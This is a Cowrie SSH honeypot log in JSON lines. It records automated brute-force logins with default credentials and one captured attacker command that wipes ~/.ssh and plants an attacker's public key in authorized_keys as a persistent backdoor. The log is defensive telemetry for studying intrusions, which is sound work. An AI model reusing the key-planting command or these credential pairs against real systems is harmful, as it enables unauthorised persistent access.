{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.104077Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.211029Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.212078Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.session.connect","src_ip":"54.39.145.137","src_port":37042,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a23784d2ac","protocol":"ssh","message":"New connection: 54.39.145.137:37042 (1.2.3.4:22) [session: 26a23784d2ac]","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.308036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.309035Z","src_ip":"54.39.145.137","session":"26a23784d2ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.405101Z","src_ip":"54.39.145.137","session":"26a23784d2ac"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.832195Z","src_ip":"54.39.145.137","session":"26a23784d2ac"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:32.873518Z","src_ip":"212.227.235.229","session":"b490c42b703c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:33.931088Z","src_ip":"54.39.145.137","session":"26a23784d2ac"}
{"eventid":"cowrie.session.connect","src_ip":"54.39.145.137","src_port":37050,"dst_ip":"1.2.3.4","dst_port":22,"session":"25dfa87518c6","protocol":"ssh","message":"New connection: 54.39.145.137:37050 (1.2.3.4:22) [session: 25dfa87518c6]","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.027868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.028811Z","src_ip":"54.39.145.137","session":"25dfa87518c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.126634Z","src_ip":"54.39.145.137","session":"25dfa87518c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.557989Z","src_ip":"54.39.145.137","session":"25dfa87518c6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.658333Z","src_ip":"54.39.145.137","session":"25dfa87518c6"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:34.659441Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40800,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c8da78ac654","protocol":"ssh","message":"New connection: 212.227.125.160:40800 (1.2.3.4:22) [session: 5c8da78ac654]","sensor":"my-vps","timestamp":"2025-08-28T13:42:43.843853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:42:43.845571Z","src_ip":"212.227.125.160","session":"5c8da78ac654"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:42:44.015316Z","src_ip":"212.227.125.160","session":"5c8da78ac654"}
{"eventid":"cowrie.login.failed","username":"operator","password":"111111","message":"login attempt [operator/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:42:44.527072Z","src_ip":"212.227.125.160","session":"5c8da78ac654"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:45.699225Z","src_ip":"212.227.125.160","session":"5c8da78ac654"}
{"eventid":"cowrie.session.connect","src_ip":"66.240.192.82","src_port":38113,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a5d99561d7b","protocol":"ssh","message":"New connection: 66.240.192.82:38113 (1.2.3.4:22) [session: 9a5d99561d7b]","sensor":"my-vps","timestamp":"2025-08-28T13:43:00.582807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:43:00.583742Z","src_ip":"66.240.192.82","session":"9a5d99561d7b"}
{"eventid":"cowrie.client.kex","hassh":"b8069e0b946242e63cf891f54883713b","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b8069e0b946242e63cf891f54883713b","sensor":"my-vps","timestamp":"2025-08-28T13:43:00.758484Z","src_ip":"66.240.192.82","session":"9a5d99561d7b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:43:01.110180Z","src_ip":"66.240.192.82","session":"9a5d99561d7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53162,"dst_ip":"1.2.3.4","dst_port":22,"session":"355d2ed3ca63","protocol":"ssh","message":"New connection: 212.227.125.160:53162 (1.2.3.4:22) [session: 355d2ed3ca63]","sensor":"my-vps","timestamp":"2025-08-28T13:43:20.488668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:43:20.581484Z","src_ip":"212.227.125.160","session":"355d2ed3ca63"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:43:20.734573Z","src_ip":"212.227.125.160","session":"355d2ed3ca63"}
{"eventid":"cowrie.login.failed","username":"operator","password":"1234567","message":"login attempt [operator/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:43:21.376501Z","src_ip":"212.227.125.160","session":"355d2ed3ca63"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:43:22.556820Z","src_ip":"212.227.125.160","session":"355d2ed3ca63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50108,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8bf488777bf","protocol":"ssh","message":"New connection: 212.227.125.160:50108 (1.2.3.4:22) [session: f8bf488777bf]","sensor":"my-vps","timestamp":"2025-08-28T13:43:57.797486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:43:57.855403Z","src_ip":"212.227.125.160","session":"f8bf488777bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:43:58.061764Z","src_ip":"212.227.125.160","session":"f8bf488777bf"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:43:58.694535Z","src_ip":"212.227.125.160","session":"f8bf488777bf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:43:59.874473Z","src_ip":"212.227.125.160","session":"f8bf488777bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:44:19.579571Z","src_ip":"212.227.235.229","session":"6c19d310d2c2"}
{"eventid":"cowrie.session.closed","duration":180.66029500961304,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:44:19.583405Z","src_ip":"212.227.235.229","session":"6c19d310d2c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59844,"dst_ip":"1.2.3.4","dst_port":22,"session":"a76b65dfcee7","protocol":"ssh","message":"New connection: 212.227.125.160:59844 (1.2.3.4:22) [session: a76b65dfcee7]","sensor":"my-vps","timestamp":"2025-08-28T13:44:34.284307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:44:34.285251Z","src_ip":"212.227.125.160","session":"a76b65dfcee7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:44:34.450127Z","src_ip":"212.227.125.160","session":"a76b65dfcee7"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password","message":"login attempt [developer/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:44:34.948457Z","src_ip":"212.227.125.160","session":"a76b65dfcee7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:44:36.198150Z","src_ip":"212.227.125.160","session":"a76b65dfcee7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42190,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b1ad34917bd","protocol":"ssh","message":"New connection: 212.227.125.160:42190 (1.2.3.4:22) [session: 0b1ad34917bd]","sensor":"my-vps","timestamp":"2025-08-28T13:45:09.675584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:45:09.676505Z","src_ip":"212.227.125.160","session":"0b1ad34917bd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:45:09.845466Z","src_ip":"212.227.125.160","session":"0b1ad34917bd"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456789","message":"login attempt [developer/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:45:10.441327Z","src_ip":"212.227.125.160","session":"0b1ad34917bd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:45:11.614485Z","src_ip":"212.227.125.160","session":"0b1ad34917bd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49872,"dst_ip":"1.2.3.4","dst_port":22,"session":"4131d7b1d9f0","protocol":"ssh","message":"New connection: 217.72.205.35:49872 (1.2.3.4:22) [session: 4131d7b1d9f0]","sensor":"my-vps","timestamp":"2025-08-28T13:45:43.295422Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:45:43.296692Z","src_ip":"217.72.205.35","session":"4131d7b1d9f0"}
